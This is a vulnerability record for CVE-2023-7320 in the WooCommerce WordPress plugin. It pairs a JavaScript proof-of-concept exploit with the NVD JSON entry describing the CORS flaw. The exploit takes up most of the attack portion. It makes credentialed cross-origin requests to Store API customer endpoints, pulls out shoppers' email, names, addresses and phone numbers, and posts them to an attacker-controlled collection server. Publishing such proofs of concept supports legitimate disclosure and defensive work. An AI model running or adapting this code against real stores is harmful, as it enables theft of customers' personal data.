CVE-2023-7320

// CVE-2023-7320 PoC - WooCommerce Store API CORS Information Disclosure // This PoC demonstrates how an attacker can steal user PII from a vulnerable WooCommerce site const TARGET_SITE = 'https://vulnerable-woocommerce-site.com'; async function exploitCORS() { try { // Attempt to access WooCommerce Store API endpoints const endpoints = [ '/?rest_route=/wc/store/v1/customers/me', '/?rest_route=/wc/store/v1/customers', '/wp-json/wc/store/v1/customers/me' ]; for (const endpoint of endpoints) { console.log(`[*] Trying endpoint: ${endpoint}`); const response = await fetch(TARGET_SITE + endpoint, { method: 'GET', credentials: 'include', // Include cookies for authenticated requests mode: 'cors' // Enable CORS request }); if (response.ok) { const data = await response.json(); console.log('[+] Success! Extracted data:'); console.log(JSON.stringify(data, null, 2)); // Extract PII fields const pii = { email: data.email, first_name: data.first_name, last_name: data.last_name, billing_address: data.billing, shipping_address: data.shipping, phone: data.billing?.phone }; // Send stolen data to attacker's server await fetch('https://attacker-controlled-server.com/collect', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify(pii) }); console.log('[+] PII data exfiltrated successfully'); return pii; } } } catch (error) { console.error('[-] Exploitation failed:', error.message); } return null; } // Execute the exploit // Note: This PoC requires the victim to be logged into the WooCommerce site // and visit a page containing this script exploitCORS();

{"cve": {"id": "CVE-2023-7320", "sourceIdentifier": "[email protected]", "published": "2025-10-29T07:15:33.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.8.2, due to improper CORS handling on the Store API's REST endpoints allowing direct external access from any origin. This can allow unauthenticated attackers to extract sensitive user information including PII(Personal Identifiable Information)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2939652@woocommerce/trunk&old=2933569@woocommerce/trunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wpscan.com/vulnerability/d1cec296-b5df-4cea-8c0d-d03a975cb6af", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2d1879-c337-41c9-9f47-f9c2fe8e5928?source=cve", "source": "[email protected]"}]}}